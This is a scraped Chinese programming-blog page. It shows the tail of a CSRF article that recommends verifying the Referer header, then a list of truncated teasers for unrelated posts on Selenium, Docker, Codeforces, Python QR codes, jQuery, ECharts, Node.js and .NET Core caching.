3.验证Referer
资料
https://security.tencent.com/index.php/blog/msg/24
4_CSRF的更多相关文章
随机推荐
- Selenium webdriver定位iframe里面元素两种方法
以东方财富网登录页面为例: 在查找元素过程中,直接通过id或者xpath等找不到元素,查看页面源代码发现元素是属于iframe里,例如: <div class="wrap_login& ...
- Docker与KVM之间的区别
一.Docker简介 Docker 项目的目标是实现轻量级的操作系统虚拟化解决方案. Docker 的基础是 Linux 容器(LXC)等技术. 在 LXC 的基础上 Docker 进行了进一步的封装 ...
- Codeforces_776E: The Holmes Children (数论 欧拉函数)
题目链接 先看题目中给的函数f(n)和g(n) 对于f(n),若自然数对(x,y)满足 x+y=n,且gcd(x,y)=1,则这样的数对对数为f(n) 证明f(n)=phi(n) 设有命题 对任意自然 ...
- (转)面试大总结之一:Java搞定面试中的链表题目
面试大总结之一:Java搞定面试中的链表题目 分类: Algorithm Interview2013-11-16 05:53 11628人阅读 评论(40) 收藏 举报 链表是面试中常出现的一类题目, ...
- python之二维码生成
生成的二维码只是网址的链接 直接上代码: import qrcode title = input("要生成的内容:") img = qrcode.make(title) with ...
- 【javascript】ajax的参数
1. 常用参数 url type: contentType: dataType: data: success: error 2. 特殊参数 context: 这个对象用于设置Ajax相关回调函数的上下 ...
- 【echart】学习笔记
1. x 轴 y轴 的max min 只能为5的倍数 2.
- 【nodejs】nodejs 的linux安装(转)
(一) 编译好的文件 简单说就是解压后,在bin文件夹中已经存在node以及npm,如果你进入到对应文件的中执行命令行一点问题都没有,不过不是全局的,所以将这个设置为全局就好了. ./node -v ...
- 基于.NET CORE微服务框架 -谈谈Cache中间件和缓存降级
1.前言 surging受到不少.net同学的青睐,也提了不少问题,提的最多的是什么时候集成API 网关,在这里回答大家最近已经开始着手研发,应该在1,2个月内会有个初版API网关,其它像Token身 ...
- 基于jQuery开发的手风琴插件 jquery.accordion.js
1.插件代码 少说多做,基于jQuery的手风琴插件jquery.accordion.js的代码: /* * 手风琴插件说明: * 1.treeTrunk对应树干 * 2.treeLeaf对应树叶 ...